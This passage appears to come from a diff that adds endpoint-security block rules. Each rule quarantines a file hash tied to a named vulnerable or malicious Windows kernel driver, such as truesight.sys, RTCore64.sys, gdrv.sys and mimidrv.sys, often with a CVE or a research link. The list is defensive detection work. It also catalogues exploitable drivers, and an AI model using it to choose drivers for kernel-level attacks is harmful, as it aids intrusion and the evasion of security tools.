"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831730Z", + "creation_date": "2026-03-23T11:45:30.831732Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831738Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "69e26ad15c0a8128af8b33d0eed0674137f040386fba9bdb2951f5316380047f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "468b5f63-5c34-568c-a2ae-1478c843abb9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816845Z", + "creation_date": "2026-03-23T11:45:30.816849Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816855Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "63865f04c1150655817ed4c9f56ad9f637d41ebd2965b6127fc7c02757a7800e", + "comment": "Vulnerable Kernel Driver (aka CP2X72C.SYS) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "468ef357-2cbb-5060-a4fe-f2c4969e2a73", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472781Z", + "creation_date": "2026-03-23T11:45:31.472785Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.472794Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "18d775e0c20385cbf3960af4f34f692413d079c65d0a395cd5666aea1ba2abf0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "469ede74-dea3-54f0-aaf0-86af1b795905", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453072Z", + "creation_date": "2026-03-23T11:45:30.453076Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453084Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8b688dd055ead2c915a139598c8db7962b42cb6e744eaacfcb338c093fc1f4e7", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "46a13a09-3ebe-5bec-95c1-3ba9bd0bc34b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.475945Z", + "creation_date": "2026-03-23T11:45:31.475958Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.475968Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "338640f5bd468ab9235be611cd141dd55bc90b90f4c1d182b81ee28946870cf6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "46a861e5-7908-547a-8e1f-eb47b8277b7b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612868Z", + "creation_date": "2026-03-23T11:45:29.612881Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612887Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "b8fcc8ef2b27c0c0622d069981e39f112d3b3b0dbede053340bc157ba1316eab", + "comment": "Marvin Test Solutions HW vulnerable driver (aka Hw.sys and Hw64.sys) [https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "46aa5cbc-c18c-5ee4-bb6b-7c2aeb979b60", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473608Z", + "creation_date": "2026-03-23T11:45:31.473612Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.473623Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3729b57e32e9e97a62afe6ded0f9df82680df58165727a6f89470a29631364f0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "46bd6960-86b7-5e4c-84e2-5ee8abe6019a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822264Z", + "creation_date": "2026-03-23T11:45:30.822266Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822271Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b4341b5814bf1b0291739f00c359f9dc1e3b8a66dede099086f9760f7f4e0885", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "46c130a2-b83f-5a8e-b4f7-d96b98955594", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824258Z", + "creation_date": "2026-03-23T11:45:30.824260Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824265Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "31a0a87bfcfbd1e3b11d7b243d00afa64e2c929650abd4f25bbbab6076a09eb5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "46c17287-e333-57c2-ba23-9c41a3043188", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486830Z", + "creation_date": "2026-03-23T11:45:31.486833Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486842Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8f4fce3299c057b842729aeeeed7357b9e49d39eb7cd441d8c27429c0e6f5344", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "46c4b987-8405-5e51-abe3-16979c32d9e4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.463241Z", + "creation_date": 
"2026-03-23T11:45:30.463244Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.463253Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0f98492c92e35042b09032e3d9aedc357e4df94fc840217fa1091046f9248a06", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "46c60627-4024-5982-a0dc-53158bbd3bb2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492303Z", + "creation_date": "2026-03-23T11:45:31.492305Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492310Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f8d010b6ac526ca64bd8e83b85f70d012e0c70f9fef7a994c81b23374cabdfd6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "46c9f10d-bef5-5fc8-ad27-ab886dc9f099", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609111Z", + "creation_date": "2026-03-23T11:45:29.609113Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609118Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b", + "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "46e1caab-e832-52ef-a626-e70f095ffa09", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146331Z", + "creation_date": "2026-03-23T11:45:31.146333Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146338Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1f831d25420ac04def39ee82c27d04a399c5c190c0e0b46f3ae9f633af9c67f7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "46e448ef-039e-52ed-add9-8a1b75817393", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822493Z", + "creation_date": "2026-03-23T11:45:31.822496Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822505Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "478d8b424aea58c61633bd61bfb5c869b7b6657bec5c0e94b94ad420ead4087f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4700c6d9-95c2-53eb-8f37-fcd863c9d622", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831109Z", + "creation_date": "2026-03-23T11:45:30.831111Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831117Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "866d0e5b9ee58fbd240988ec6339f4969e8f07f1c2db0f41aa5051d1a2cdb0d1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "471c270b-b1f9-5924-8e0f-9ae7d30f098c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617626Z", + "creation_date": "2026-03-23T11:45:29.617628Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617634Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "43c44fde2c29ea68e5af2c7684d069ae0ab94c9f0e790c5530d17ac3be7d4076", 
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "475d0c41-fe6d-5f32-bd5d-800a1ba62fa2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807714Z", + "creation_date": "2026-03-23T11:45:31.807717Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807726Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9d072f75fb30b7e26a0b4fd3b424b98ca0d027663ca4a7e93231d6113ed006d1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4777c8c4-651e-52b8-8538-302579303eb8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973755Z", + "creation_date": "2026-03-23T11:45:29.973757Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973763Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "76e807b6c0214e66455f09a8de8faad40b738982ca84470f0043de0290449524", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "47877298-f828-54f3-815a-98a92bd7012d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160854Z", + "creation_date": "2026-03-23T11:45:31.160858Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160865Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ea49294c0fd55e801029f6d91fb7214e430129847f000703f64ab55dea5c6383", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "478c5bcf-0e8e-52ed-bd6a-a6848fe623ed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485103Z", + "creation_date": "2026-03-23T11:45:31.485107Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485117Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a8e00fc3b744f3e5d3d92540224f47ef464dccb2be3643cb3edfe6b2c8190791", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "478efeeb-cfb1-5749-b6c5-bd400eed0311", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461070Z", + "creation_date": 
"2026-03-23T11:45:30.461073Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461082Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b749566057dee0439f54b0d38935e5939b5cb011c46d7022530f748ebc63efe5", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4793c542-0ab5-57ca-a27b-eb5f6d91cda6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488908Z", + "creation_date": "2026-03-23T11:45:31.488910Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488915Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "87905c83e18400b2f15f26e8e22ec9e245778f8e35d085b3277c044eae9cc4d3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "479477a2-1417-5663-927e-489e9e90c8b3", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818291Z", + "creation_date": "2026-03-23T11:45:31.818295Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818303Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8aef476014f44450ac2b1bd46946473f51aa6cba2fbfa0b65d9fa68d34398def", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "47a88448-4b89-5a9e-8cef-a3633f100845", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.476707Z", + "creation_date": "2026-03-23T11:45:30.476711Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
